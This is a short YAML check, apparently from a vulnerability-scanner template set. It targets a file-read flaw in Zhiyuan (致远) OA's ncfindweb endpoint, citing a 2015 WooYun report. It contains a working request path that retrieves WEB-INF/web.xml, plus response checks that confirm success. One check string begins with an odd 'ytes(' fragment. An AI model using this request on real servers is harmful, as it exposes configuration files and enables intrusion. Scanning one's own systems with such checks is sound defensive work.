product: 致远OA
vName: 致远OA ncfindweb文件读取
type: 文件读取
vID:
  - wooyun-2015-148227
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ncfindweb?service=iprealertconfigservice&filename=web-inf/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes("<servlet-name>NCInvokerServlet</servlet-name>
            logic: and
          header:
            value:
              - Content-Type
              - application/xml
            logic: and